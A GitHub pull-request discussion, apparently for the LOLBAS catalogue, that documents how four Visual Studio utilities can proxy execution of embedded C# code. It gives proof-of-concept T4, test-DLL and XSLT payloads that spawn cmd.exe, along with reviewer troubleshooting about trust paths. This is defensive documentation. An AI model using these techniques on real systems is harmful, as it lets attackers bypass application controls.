Add TextTransform.exe, TextTransformCore.exe, MSTest.exe and Microsoft.XslDebugger.Host.exe to the OtherMSBinaries category

[Pumi96]

Summary

This PR adds TextTransform.exe, TextTransformCore.exe, and MSTest.exe to the OtherMSBinaries category.

All three are Microsoft-signed command-line utilities included with Visual Studio. Their legitimate purposes involve development workflows: processing T4 text templates (.tt files) for code generation, and executing unit test assemblies.

The Execution Primitive

TextTransform / TextTransformCore:
Because T4 templates inherently support executing embedded C# or VB.NET code during the transformation process, an attacker can abuse either utility to proxy the execution of arbitrary C# payloads. (MITRE T1127)

Technical Note: Because TextTransformCore.exe runs on .NET Core, it requires explicit assembly references (like System.Diagnostics.Process) inside the template to execute certain actions, whereas the standard .NET Framework version has these available by default.

MSTest:
MSTest.exe is a legacy test execution runner. By crafting a malicious .NET DLL adorned with standard Unit Testing attributes ([TestClass], [TestMethod]), an attacker can force the runner to load the assembly and execute arbitrary code hidden within the test methods. (MITRE T1218)

Both vectors grant access to the underlying runtime (spawning processes, network connections, file system access) and can be used to bypass defensive controls that do not restrict trusted developer utilities.

Microsoft.XslDebugger.Host:
Microsoft.XslDebugger.Host.exe is an XSLT execution utility for Visual Studio. When invoked with /enable:all, it compiles and executes arbitrary C# code embedded in msxsl:script blocks within XSLT stylesheets. This grants full .NET Framework access including Process.Start() and WebClient.DownloadFile(), making it both an Execute and Download primitive. (MITRE T1220)

Proof of Concept 1: TextTransform.exe (.NET Framework)

1. Create a file named payload.tt containing the following embedded C# code:

<#@ template language="C#" #>
<#@ import namespace="System.Diagnostics" #>
<#
    Process.Start("cmd.exe");
#>

2. Execute the template using the utility:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransform.exe" -out output.txt payload.tt

3. Result: cmd.exe is successfully spawned as a child process.

Proof of Concept 2: TextTransformCore.exe (.NET Core)

1. Create a file named payload_core.tt containing the following embedded C# code with the required assembly references:

<#@ template language="C#" #>
<#@ assembly name="System.Diagnostics.Process" #>
<#@ assembly name="System.ComponentModel.Primitives" #>
<#@ import namespace="System.Diagnostics" #>
<#
    Process.Start("cmd.exe");
#>

2. Execute the template using the utility:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\TextTransformCore.exe" payload_core.tt

3. Result: cmd.exe is successfully spawned as a child process.

Proof of Concept 3: MSTest.exe

1. Create a file named MaliciousTest.cs containing the following C# code:

using Microsoft.VisualStudio.TestTools.UnitTesting;
using System.Diagnostics;

[TestClass]
public class LolbasTest
{
    [TestMethod]
    public void Execute()
    {
        Process.Start("cmd.exe");
    }
}

2. Compile the DLL using the built-in C# compiler:

csc.exe /target:library /reference:"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\ReferenceAssemblies\v4.0\Microsoft.VisualStudio.QualityTools.UnitTestFramework.dll" /out:MaliciousTest.dll MaliciousTest.cs

4. Execute the payload using the test runner:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\MSTest.exe" /testcontainer:MaliciousTest.dll /resultsfile:output.trx

5. Result: cmd.exe is successfully spawned as a child process of MSTest.exe.

Proof of Concept 4: Microsoft.XslDebugger.Host.exe (Execute + Download)

1. Create a minimal XML input file input.xml:

<?xml version="1.0"?><data>test</data>

2. Create an XSLT payload payload.xsl with embedded C#:

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:custom">
  <msxsl:script language="C#" implements-prefix="user"><![CDATA[
    public string execute() {
      System.Diagnostics.Process.Start("cmd.exe");
      return "done";
    }
  ]]></msxsl:script>
  <xsl:template match="/"><xsl:value-of select="user:execute()"/></xsl:template>
</xsl:stylesheet>

3. Execute:

"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Xml\Microsoft.XslDebugger.Host.exe" input.xml payload.xsl /enable:all

4. Result: cmd.exe is successfully spawned as a child process.

[wietze]

Unfortunately I could not get the first one to work, and the other three I could not find in a fresh Visual Studio 2026 installation. Could you give precise instructions on what modules/components one needs to install to get the ones you require?

[wietze]

Could you please specify what packages you need to get this file in Visual Studio? It is not present by default.

[Pumi96]

Gone in 2026 yeah, only in VS 2022. Will scope it.

[wietze]

I could not get this to work - nothing happens.

[Pumi96]

Can see from your screenshot - the files are on the Desktop and you're passing input.xml payload.xsl as relative paths. That's the problem. CAS treats relative paths as untrusted and blocks execution silently. Pass absolute paths and it works:

[wietze]

Could you please specify what packages you need to get this file in Visual Studio? It is not present by default.

[Pumi96]

Not installed by default - needs the "Text Template Transformation" component (Microsoft.VisualStudio.Component.TextTemplating). You can add it via Individual components in the VS installer, or just install any of the .NET desktop / web / Azure workloads, they all pull it in. Will update the entry.

[wietze]

Could you please specify what packages you need to get this file in Visual Studio? It is not present by default.

[Pumi96]

Not installed by default - needs the "Text Template Transformation" component (Microsoft.VisualStudio.Component.TextTemplating). You can add it via Individual components in the VS installer, or just install any of the .NET desktop / web / Azure workloads, they all pull it in. Will update the entry.

[Pumi96]

Hey Wietze, Thanks for the review. I dug into all four and here's what I found. The XslDebugger one was on me. With a relative path the stylesheet runs under restricted CAS trust, so the script is blocked by a SecurityException and never actually executes. That lines up with the "nothing happens" you saw. With absolute paths it runs fine: *"Microsoft.XslDebugger.Host.exe C:\test\input.xml C:\test\payload.xsl /enable:all"* I confirmed that on VS 2026 (18.7.0): Process.Start launched cmd, and WebClient pulled a remote file to disk. I'll fix the command in the entry. TextTransform and TextTransformCore aren't there by default, that's right. They come with the Text Template Transformation component (Microsoft.VisualStudio.Component.TextTemplating), which is also bundled into the .NET desktop, ASP.NET/web and Azure workloads. Once it's installed both land in Common7\IDE, and a .tt with a C# block executes on transform. I'll add that note to both entries. MSTest is the only real change. You're right that it's gone in 2026. Even with the full testing workload you only get vstest.console.exe. But it still ships in VS 2022: I checked on 17.14.34 and MSTest.exe /testcontainer:test.dll loaded the DLL and ran the code in it. So I'll keep the entry but scope it to VS 2022. I'll push those changes. Shout if you'd rather handle MSTest differently. And if a video of the POC would help, I'm happy to record one and send it over.

…

On Tue, Jun 16, 2026 at 12:37 AM Wietze ***@***.***> wrote: ***@***.**** requested changes on this pull request. Unfortunately I could not get the first one to work, and the other three I could not find in a fresh Visual Studio 2026 installation. Could you give precise instructions on what modules/components one needs to install to get the ones you require? ------------------------------ In yml/OtherMSBinaries/MSTest.yml <#496 (comment)> : > @@ -0,0 +1,40 @@ +--- +Name: MSTest.exe Could you please specify what packages you need to get this file in Visual Studio? It is not present by default. ------------------------------ In yml/OtherMSBinaries/Microsoft.XslDebugger.Host.yml <#496 (comment)> : > @@ -0,0 +1,70 @@ +--- +Name: Microsoft.XslDebugger.Host.exe I could not get this to work - nothing happens. image.png (view on web) <https://github.com/user-attachments/assets/2ff5a10d-1399-4ab9-8af8-5b0c736e921f> ------------------------------ In yml/OtherMSBinaries/TextTransform.yml <#496 (comment)> : > @@ -0,0 +1,33 @@ +--- +Name: TextTransform.exe Could you please specify what packages you need to get this file in Visual Studio? It is not present by default. ------------------------------ In yml/OtherMSBinaries/TextTransformCore.yml <#496 (comment)> : > @@ -0,0 +1,35 @@ +--- +Name: TextTransformCore.exe Could you please specify what packages you need to get this file in Visual Studio? It is not present by default. — Reply to this email directly, view it on GitHub <#496?email_source=notifications&email_token=AOO54BWGSRROZWP5GKASHXT5ABUA5A5CNFSNUABKM5UWIORPF5TWS5BNNB2WEL2QOVWGYUTFOF2WK43UKJSXM2LFO4XTINJQGEZTINRQGI22M4TFMFZW63VGMF2XI2DPOKSWK5TFNZ2KYZTPN52GK4S7MNWGSY3L#pullrequestreview-4501346025>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AOO54BRNFPFEUI4IQ7W66335ABUA5AVCNFSNUABFKJSXA33TNF2G64TZHMYTGNRWG4YDGNRUHNEXG43VMU5TIMJZG4YTONBXGYY2C5QC> . You are receiving this because you authored the thread.Message ID: ***@***.***>